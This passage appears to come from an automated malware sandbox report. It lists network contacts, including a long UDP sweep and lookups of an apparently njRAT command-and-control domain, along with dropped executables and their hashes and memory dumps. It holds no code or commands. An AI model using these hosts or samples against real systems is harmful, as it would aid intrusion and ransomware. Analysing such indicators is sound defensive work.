N/A 87.98.177.241:6893 udp
N/A 87.98.177.242:6893 udp
N/A 87.98.177.243:6893 udp
N/A 87.98.177.244:6893 udp
N/A 87.98.177.245:6893 udp
N/A 87.98.177.246:6893 udp
N/A 87.98.177.247:6893 udp
N/A 87.98.177.248:6893 udp
N/A 87.98.177.249:6893 udp
N/A 87.98.177.250:6893 udp
N/A 87.98.177.251:6893 udp
N/A 87.98.177.252:6893 udp
N/A 87.98.177.253:6893 udp
N/A 87.98.177.254:6893 udp
RU 91.218.114.11:80 tcp
N/A 87.98.177.255:6893 udp
N/A 87.98.178.0:6893 udp
N/A 87.98.178.1:6893 udp
N/A 87.98.178.2:6893 udp
N/A 87.98.178.3:6893 udp
N/A 87.98.178.4:6893 udp
N/A 87.98.178.5:6893 udp
N/A 87.98.178.6:6893 udp
N/A 87.98.178.7:6893 udp
N/A 87.98.178.8:6893 udp
N/A 87.98.178.9:6893 udp
N/A 87.98.178.10:6893 udp
N/A 87.98.178.11:6893 udp
N/A 87.98.178.12:6893 udp
N/A 87.98.178.13:6893 udp
N/A 87.98.178.14:6893 udp
N/A 87.98.178.15:6893 udp
N/A 87.98.178.16:6893 udp
N/A 87.98.178.17:6893 udp
N/A 87.98.178.18:6893 udp
N/A 87.98.178.19:6893 udp
N/A 87.98.178.20:6893 udp
N/A 87.98.178.21:6893 udp
N/A 87.98.178.22:6893 udp
N/A 87.98.178.23:6893 udp
N/A 87.98.178.24:6893 udp
N/A 87.98.178.25:6893 udp
N/A 87.98.178.26:6893 udp
N/A 87.98.178.27:6893 udp
N/A 87.98.178.28:6893 udp
N/A 87.98.178.29:6893 udp
N/A 87.98.178.30:6893 udp
N/A 87.98.178.31:6893 udp
N/A 87.98.178.32:6893 udp
N/A 87.98.178.33:6893 udp
N/A 87.98.178.34:6893 udp
N/A 87.98.178.35:6893 udp
N/A 87.98.178.36:6893 udp
N/A 87.98.178.37:6893 udp
N/A 87.98.178.38:6893 udp
N/A 87.98.178.39:6893 udp
N/A 87.98.178.40:6893 udp
N/A 87.98.178.41:6893 udp
N/A 87.98.178.42:6893 udp
N/A 87.98.178.43:6893 udp
N/A 87.98.178.44:6893 udp
N/A 87.98.178.45:6893 udp
N/A 87.98.178.46:6893 udp
N/A 87.98.178.47:6893 udp
N/A 87.98.178.48:6893 udp
N/A 87.98.178.49:6893 udp
N/A 87.98.178.50:6893 udp
N/A 87.98.178.51:6893 udp
N/A 87.98.178.52:6893 udp
N/A 87.98.178.53:6893 udp
N/A 87.98.178.54:6893 udp
N/A 87.98.178.55:6893 udp
N/A 87.98.178.56:6893 udp
N/A 87.98.178.57:6893 udp
N/A 87.98.178.58:6893 udp
N/A 87.98.178.59:6893 udp
N/A 87.98.178.60:6893 udp
N/A 87.98.178.61:6893 udp
N/A 87.98.178.62:6893 udp
N/A 87.98.178.63:6893 udp
N/A 87.98.178.64:6893 udp
N/A 87.98.178.65:6893 udp
N/A 87.98.178.66:6893 udp
N/A 87.98.178.67:6893 udp
N/A 87.98.178.68:6893 udp
N/A 87.98.178.69:6893 udp
N/A 87.98.178.70:6893 udp
N/A 87.98.178.71:6893 udp
N/A 87.98.178.72:6893 udp
N/A 87.98.178.73:6893 udp
N/A 87.98.178.74:6893 udp
N/A 87.98.178.75:6893 udp
N/A 87.98.178.76:6893 udp
N/A 87.98.178.77:6893 udp
N/A 87.98.178.78:6893 udp
N/A 87.98.178.79:6893 udp
N/A 87.98.178.80:6893 udp
N/A 87.98.178.81:6893 udp
N/A 87.98.178.82:6893 udp
N/A 87.98.178.83:6893 udp
N/A 87.98.178.84:6893 udp
N/A 87.98.178.85:6893 udp
N/A 87.98.178.86:6893 udp
N/A 87.98.178.87:6893 udp
N/A 87.98.178.88:6893 udp
N/A 87.98.178.89:6893 udp
N/A 87.98.178.90:6893 udp
N/A 87.98.178.91:6893 udp
N/A 87.98.178.92:6893 udp
N/A 87.98.178.93:6893 udp
N/A 87.98.178.94:6893 udp
N/A 87.98.178.95:6893 udp
N/A 87.98.178.96:6893 udp
N/A 87.98.178.97:6893 udp
N/A 87.98.178.98:6893 udp
N/A 87.98.178.99:6893 udp
N/A 87.98.178.100:6893 udp
N/A 87.98.178.101:6893 udp
N/A 87.98.178.102:6893 udp
N/A 87.98.178.103:6893 udp
N/A 87.98.178.104:6893 udp
N/A 87.98.178.105:6893 udp
N/A 87.98.178.106:6893 udp
N/A 87.98.178.107:6893 udp
N/A 87.98.178.108:6893 udp
N/A 87.98.178.109:6893 udp
N/A 87.98.178.110:6893 udp
N/A 87.98.178.111:6893 udp
N/A 87.98.178.112:6893 udp
N/A 87.98.178.113:6893 udp
N/A 87.98.178.114:6893 udp
N/A 87.98.178.115:6893 udp
N/A 87.98.178.116:6893 udp
N/A 87.98.178.117:6893 udp
N/A 87.98.178.118:6893 udp
N/A 87.98.178.119:6893 udp
N/A 87.98.178.120:6893 udp
N/A 87.98.178.121:6893 udp
N/A 87.98.178.122:6893 udp
N/A 87.98.178.123:6893 udp
N/A 87.98.178.124:6893 udp
N/A 87.98.178.125:6893 udp
N/A 87.98.178.126:6893 udp
N/A 87.98.178.127:6893 udp
N/A 87.98.178.128:6893 udp
N/A 87.98.178.129:6893 udp
N/A 87.98.178.130:6893 udp
N/A 87.98.178.131:6893 udp
N/A 87.98.178.132:6893 udp
N/A 87.98.178.133:6893 udp
N/A 87.98.178.134:6893 udp
N/A 87.98.178.135:6893 udp
N/A 87.98.178.136:6893 udp
N/A 87.98.178.137:6893 udp
N/A 87.98.178.138:6893 udp
N/A 87.98.178.139:6893 udp
N/A 87.98.178.140:6893 udp
N/A 87.98.178.141:6893 udp
N/A 87.98.178.142:6893 udp
N/A 87.98.178.143:6893 udp
N/A 87.98.178.144:6893 udp
N/A 87.98.178.145:6893 udp
N/A 87.98.178.146:6893 udp
N/A 87.98.178.147:6893 udp
N/A 87.98.178.148:6893 udp
N/A 87.98.178.149:6893 udp
N/A 87.98.178.150:6893 udp
N/A 87.98.178.151:6893 udp
N/A 87.98.178.152:6893 udp
N/A 87.98.178.153:6893 udp
N/A 87.98.178.154:6893 udp
N/A 87.98.178.155:6893 udp
N/A 87.98.178.156:6893 udp
N/A 87.98.178.157:6893 udp
N/A 87.98.178.158:6893 udp
N/A 87.98.178.159:6893 udp
N/A 87.98.178.160:6893 udp
N/A 87.98.178.161:6893 udp
N/A 87.98.178.162:6893 udp
N/A 87.98.178.163:6893 udp
N/A 87.98.178.164:6893 udp
N/A 87.98.178.165:6893 udp
N/A 87.98.178.166:6893 udp
N/A 87.98.178.167:6893 udp
N/A 87.98.178.168:6893 udp
N/A 87.98.178.169:6893 udp
N/A 87.98.178.170:6893 udp
N/A 87.98.178.171:6893 udp
N/A 87.98.178.172:6893 udp
N/A 87.98.178.173:6893 udp
N/A 87.98.178.174:6893 udp
N/A 87.98.178.175:6893 udp
N/A 87.98.178.176:6893 udp
N/A 87.98.178.177:6893 udp
N/A 87.98.178.178:6893 udp
N/A 87.98.178.179:6893 udp
N/A 87.98.178.180:6893 udp
N/A 87.98.178.181:6893 udp
N/A 87.98.178.182:6893 udp
N/A 87.98.178.183:6893 udp
N/A 87.98.178.184:6893 udp
N/A 87.98.178.185:6893 udp
N/A 87.98.178.186:6893 udp
N/A 87.98.178.187:6893 udp
N/A 87.98.178.188:6893 udp
N/A 87.98.178.189:6893 udp
N/A 87.98.178.190:6893 udp
N/A 87.98.178.191:6893 udp
N/A 87.98.178.192:6893 udp
N/A 87.98.178.193:6893 udp
N/A 87.98.178.194:6893 udp
N/A 87.98.178.195:6893 udp
N/A 87.98.178.196:6893 udp
N/A 87.98.178.197:6893 udp
N/A 87.98.178.198:6893 udp
N/A 87.98.178.199:6893 udp
N/A 87.98.178.200:6893 udp
N/A 87.98.178.201:6893 udp
N/A 87.98.178.202:6893 udp
N/A 87.98.178.203:6893 udp
N/A 87.98.178.204:6893 udp
N/A 87.98.178.205:6893 udp
N/A 87.98.178.206:6893 udp
N/A 87.98.178.207:6893 udp
N/A 87.98.178.208:6893 udp
N/A 87.98.178.209:6893 udp
N/A 87.98.178.210:6893 udp
N/A 87.98.178.211:6893 udp
N/A 87.98.178.212:6893 udp
N/A 87.98.178.213:6893 udp
N/A 87.98.178.214:6893 udp
N/A 87.98.178.215:6893 udp
N/A 87.98.178.216:6893 udp
N/A 87.98.178.217:6893 udp
N/A 87.98.178.218:6893 udp
N/A 87.98.178.219:6893 udp
N/A 87.98.178.220:6893 udp
N/A 87.98.178.221:6893 udp
N/A 87.98.178.222:6893 udp
N/A 87.98.178.223:6893 udp
N/A 87.98.178.224:6893 udp
N/A 87.98.178.225:6893 udp
N/A 87.98.178.226:6893 udp
N/A 87.98.178.227:6893 udp
N/A 87.98.178.228:6893 udp
N/A 87.98.178.229:6893 udp
N/A 87.98.178.230:6893 udp
N/A 87.98.178.231:6893 udp
N/A 87.98.178.232:6893 udp
N/A 87.98.178.233:6893 udp
N/A 87.98.178.234:6893 udp
N/A 87.98.178.235:6893 udp
N/A 87.98.178.236:6893 udp
N/A 87.98.178.237:6893 udp
N/A 87.98.178.238:6893 udp
N/A 87.98.178.239:6893 udp
N/A 87.98.178.240:6893 udp
N/A 87.98.178.241:6893 udp
N/A 87.98.178.242:6893 udp
N/A 87.98.178.243:6893 udp
N/A 87.98.178.244:6893 udp
N/A 87.98.178.245:6893 udp
N/A 87.98.178.246:6893 udp
N/A 87.98.178.247:6893 udp
N/A 87.98.178.248:6893 udp
N/A 87.98.178.249:6893 udp
N/A 87.98.178.250:6893 udp
N/A 87.98.178.251:6893 udp
N/A 87.98.178.252:6893 udp
N/A 87.98.178.253:6893 udp
N/A 87.98.178.254:6893 udp
N/A 87.98.179.255:6893 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
RU 91.218.114.25:80 tcp
US 8.8.8.8:53 udp
RU 91.218.114.26:80 tcp
SE 40.126.53.21:443 tcp
SE 40.126.53.21:443 tcp
RU 91.218.114.79:80 tcp
US 8.8.8.8:53 udp
N/A 145.14.144.15:21 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 udp
US 185.196.8.22:80 dlllwao.info tcp
FI 95.216.98.218:2023 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 185.196.8.22:80 dlllwao.info tcp
FI 95.216.98.218:2023 tcp
RU 91.218.114.37:80 tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 185.196.8.22:80 dlllwao.info tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 208.83.223.34:80 tcp
US 185.196.8.22:80 dlllwao.info tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 185.196.8.22:80 dlllwao.info tcp
RU 77.91.124.172:80 77.91.124.172 tcp
RU 77.91.68.21:80 77.91.68.21 tcp
US 104.21.24.252:80 soupinterestoe.fun tcp
US 8.8.8.8:53 21.68.91.77.in-addr.arpa udp
DE 140.82.121.3:443 github.com tcp
RU 5.42.65.31:48396 tcp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 31.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 252.24.21.104.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 185.196.8.22:80 dlllwao.info tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp
US 185.196.8.22:80 dlllwao.info tcp
US 8.8.8.8:53 DanilWhiteNjrat-57320.portmap.host udp

Files

C:\Users\Admin\AppData\Local\Temp\RarSFX0\wecker.txt.bat

MD5 6a83b03054f53cb002fdca262b76b102
SHA1 1bbafe19ae5bcdd4f3710f13d06332128a5d54f7
SHA256 7952248cb4ec97bc0d2ab3b51c126c7b0704a7f9d42bddf6adcb04b5657c7a4e
SHA512 fa8d907bb187f32de1cfbe1b092982072632456fd429e4dd92f62e482f2ad23e602cf845a2fd655d0e4b8314c1d7a086dc9545d4d82996afbccb364ddc1e9eae

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 fe1bc60a95b2c2d77cd5d232296a7fa4
SHA1 c07dfdea8da2da5bad036e7c2f5d37582e1cf684
SHA256 b3e1e9d97d74c416c2a30dd11858789af5554cf2de62f577c13944a19623777d
SHA512 266c541a421878e1e175db5d94185c991cec5825a4bc50178f57264f3556080e6fe984ed0380acf022ce659aa1ca46c9a5e97efc25ff46cbfd67b9385fd75f89

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 1106972c03e704a5e316310ba69cfb3c
SHA1 43236560be831aca4790d7985bd5a5f20c31d888
SHA256 4c4b36e24b611fb0438786721131d314a42700863ff2bb39000492eab5092f2f
SHA512 4a19194fe8cb17c9036f399366ca8ecb9218864f3cca9bd73d23ca5218107bff3cd9a028c0db33221c5dc490a57b7e01ce632cd19f1ad3aa81d8ae14ffe7d4d8

memory/2564-36-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5116-93-0x0000000072CB0000-0x0000000073461000-memory.dmp

memory/5116-95-0x0000000005210000-0x00000000052AC000-memory.dmp

memory/5116-108-0x0000000005380000-0x0000000005390000-memory.dmp

memory/4368-171-0x00000000024C0000-0x00000000024C1000-memory.dmp

memory/2292-168-0x0000000002310000-0x0000000002311000-memory.dmp

memory/4792-165-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/4792-173-0x0000000001610000-0x0000000001620000-memory.dmp

memory/2564-189-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/2564-174-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/2564-195-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/4792-251-0x0000000001610000-0x0000000001620000-memory.dmp

memory/2564-250-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/1064-566-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1304-568-0x0000000000670000-0x000000000067F000-memory.dmp

memory/1952-571-0x0000000000400000-0x000000000041B000-memory.dmp

memory/5040-572-0x0000000000660000-0x000000000066F000-memory.dmp

memory/4476-574-0x0000000000400000-0x0000000000416000-memory.dmp

memory/764-575-0x0000000000400000-0x0000000000433000-memory.dmp

memory/5040-573-0x0000000000400000-0x000000000042E000-memory.dmp

memory/1304-570-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1964-591-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

memory/4024-595-0x0000000000400000-0x00000000004D8000-memory.dmp

memory/1964-612-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1964-598-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

memory/1964-628-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

memory/4528-633-0x00000000006E0000-0x000000000073E000-memory.dmp

memory/1964-635-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1964-670-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

memory/1964-672-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1964-695-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1964-681-0x00007FFBFC510000-0x00007FFBFC520000-memory.dmp

memory/1964-708-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/4528-707-0x00000000006E0000-0x000000000073E000-memory.dmp

memory/1456-703-0x0000000000080000-0x0000000000114000-memory.dmp

memory/1964-730-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/2456-586-0x0000000000400000-0x000000000041B000-memory.dmp

memory/1456-781-0x0000000000930000-0x000000000093C000-memory.dmp

memory/5116-553-0x0000000072CB0000-0x0000000073461000-memory.dmp

memory/1964-782-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1480-839-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/2888-840-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1456-838-0x0000000000940000-0x000000000094A000-memory.dmp

memory/1964-833-0x00007FFC3C480000-0x00007FFC3C689000-memory.dmp

memory/1964-848-0x00007FFC3ADE0000-0x00007FFC3AE9D000-memory.dmp

memory/4304-876-0x0000000000400000-0x000000000041B000-memory.dmp

memory/764-534-0x0000000000400000-0x0000000000433000-memory.dmp

memory/1456-877-0x0000000000960000-0x000000000096C000-memory.dmp

memory/1456-1069-0x0000000000970000-0x000000000097C000-memory.dmp

memory/1496-1067-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/4528-1070-0x00000000006E0000-0x000000000073E000-memory.dmp

memory/1064-1068-0x0000000000400000-0x000000000042F000-memory.dmp

memory/1496-1254-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/4792-163-0x0000000001610000-0x0000000001620000-memory.dmp

memory/1456-1555-0x00007FFC19E30000-0x00007FFC1A8F2000-memory.dmp

memory/1492-1674-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/3044-1755-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4792-125-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/2564-1972-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/5504-2065-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4476-2066-0x0000000000400000-0x0000000000416000-memory.dmp

memory/1788-112-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4492-2250-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2292-2331-0x0000000000400000-0x000000000068E000-memory.dmp

memory/1788-2249-0x0000000000400000-0x00000000004CC000-memory.dmp

memory/4368-2354-0x0000000000400000-0x0000000000705000-memory.dmp

memory/1492-2468-0x0000000000F00000-0x0000000000F10000-memory.dmp

memory/1492-2513-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/1492-2547-0x0000000000F00000-0x0000000000F10000-memory.dmp

memory/4528-2514-0x00000000006E0000-0x000000000073E000-memory.dmp

memory/1676-97-0x0000000010000000-0x0000000010010000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\RIP_YOUR_PC_LOL.exe

MD5 53b65ec2bc88c315eaebbe67dbc6f4d1
SHA1 01e59c8db013a63e48a07ecc6e3313d55a54c299
SHA256 b5c8a8783b45aac8f9c276e4ca00306e40824b80af930ce36b4fb05332b4bdc9
SHA512 d729ab611880a2bd128ae2abfcaeaa9f9f79a8e8feafba38dae84453c11bcea71631846eee5b7d961f1cbd03f31f6ff4f8a0283ba6e3f1bdc6c7c3ecc4842125

memory/4024-85-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\ska2pwej.aeh.exe

MD5 b1b49a97a1d8ffa0e79894d2c5c9d1ce
SHA1 4c683818039174029fb00735cbfcd609fbc638bd
SHA256 ba659cae33cd1fdf6f14820c9912558624cd0e75f79f5ad2be7b9db0a6e8480a
SHA512 75646bec8bb8c4e9afb7dab874f32a2e2fc1b63f5905b5936ac7c9a8825e0658a68100c1bbaccc45c22c1f6955da4c7ae41405e0561df2fd48898c645e821caa

memory/5116-82-0x0000000000870000-0x0000000000878000-memory.dmp

memory/1496-2729-0x000000006F0B0000-0x000000006F661000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\bot.exe

MD5 cb960c030f900b11e9025afea74f3c0c
SHA1 bbdcad9527c814a9e92cdc1ee27ae9db931eb527
SHA256 91a293c01eb7f038ddbc3a4caf8b4437da3f7d0abeef6b10d447127fac946b99
SHA512 9ca0291caa566b2cde3d4ba4634a777a884a97c471794eff544923457e331d78f01e1e4e8b893e762a33d7bdaa0f05e8a8b8e587c903e0de9bf61c069e82f554

memory/764-76-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\msg\m_finnish.wnry

MD5 35c2f97eea8819b1caebd23fee732d8f
SHA1 e354d1cc43d6a39d9732adea5d3b0f57284255d2
SHA256 1adfee058b98206cb4fbe1a46d3ed62a11e1dee2c7ff521c1eef7c706e6a700e
SHA512 908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

memory/1456-2820-0x000000001AE70000-0x000000001AE80000-memory.dmp

memory/2564-39-0x0000000000400000-0x00000000005DE000-memory.dmp

memory/764-72-0x0000000004E60000-0x0000000004E91000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 84c82835a5d21bbcf75a61706d8ab549
SHA1 5ff465afaabcbf0150d1a3ab2c2e74f3a4426467
SHA256 ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa
SHA512 90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

memory/2564-34-0x0000000002350000-0x000000000241E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\[email protected]

MD5 63210f8f1dde6c40a7f3643ccf0ff313
SHA1 57edd72391d710d71bead504d44389d0462ccec9
SHA256 2aab13d49b60001de3aa47fb8f7251a973faa7f3c53a3840cdf5fd0b26e9a09f
SHA512 87a89e8ab85be150a783a9f8d41797cfa12f86fdccb48f2180c0498bfd2b1040b730dee4665fe2c83b98d436453680226051b7f1532e1c0e0cda0cf702e80a11

C:\Users\Admin\AppData\Local\Temp\RarSFX0\bot.exe

MD5 a8b8b90c0cf26514a3882155f72d80bd
SHA1 75679e54563b5e5eacf6c926ac4ead1bcc19344f
SHA256 4fe94f6567af0c38ee6f0f5a05d36286c0607552ea97166a56c4f647e9bf2452
SHA512 88708b20357f1d46957d56d80ac10479cffad72d6bb0268383d360e8904f341c01542b9bbe121b024ef6d6850a1ea4494e077ff124bc9201ae141c46ab1359a4

C:\Users\Admin\AppData\Local\Temp\RarSFX0\4363463463464363463463463.exe

MD5 2a94f3960c58c6e70826495f76d00b85
SHA1 e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512 fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f

memory/5780-3694-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4792-3775-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/5780-3800-0x0000000000400000-0x0000000000414000-memory.dmp

memory/6752-4141-0x0000000000400000-0x000000000041B000-memory.dmp

memory/2304-4288-0x0000000000400000-0x000000000041B000-memory.dmp

memory/4792-4387-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/1496-4393-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/4792-4509-0x0000000001610000-0x0000000001620000-memory.dmp

memory/6592-4640-0x000000006F0B0000-0x000000006F661000-memory.dmp

memory/6592-4671-0x0000000000FF0000-0x0000000001000000-memory.dmp

memory/6036-4672-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/2696-4674-0x00000000020C0000-0x00000000020C1000-memory.dmp

memory/2292-4730-0x0000000002310000-0x0000000002311000-memory.dmp

memory/6036-4772-0x0000000000400000-0x00000000005B6000-memory.dmp

memory/4368-4779-0x00000000024C0000-0x00000000024C1000-memory.dmp

memory/764-6204-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\lumtru.exe

MD5 700a9938d0fcff91df12cbefe7435c88
SHA1 f1f661f00b19007a5355a982677761e5cf14a2c4
SHA256 946583a0803167de24c7c0d768fe49546108e43500a1c2c838e7e0560addc818
SHA512 7fa6b52d10bcfc56ac4a43eda11ae107347ba302cc5a29c446b2d4a3f93425db486ed24a496a8acd87d98d9cfb8cad6505eb0d8d5d509bc323427b6931c8fff8

C:\Windows\directx.sys

MD5 f295caaf061f9ab446a51e01805aefae
SHA1 b9a4b804f6a95e7a782d4c5c6c3396f9707fd738
SHA256 b59878c41d52be69d5c5a7faf6df19c039d6e5774a5181dced71c4bffd122c89
SHA512 06c0be233881572f04a6dce9ec159e8f0102c5d8033708f054649383e77a5b7aa878bc63d7cab7a507a8145dc13643668374814e5c8314bfdcb4e709039a509f

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Files\alex.exe

MD5 d8337d7ca38eddace5472f7a274b3943
SHA1 273fc254a6051aaf13d74b6f426fd9f1a58dee19
SHA256 3ac6dde9c9dfcaed7066ea5af5121fd75a7c6c1ab9bb7bb4ca35784d50efa202
SHA512 c65082f8478a7dfae7c244e093f34b8cd67599ab20e39a7db3fc50b346039588772764a4f737ad71fff74655534d6c307338c36de6ca209c5ff8b41d0171f589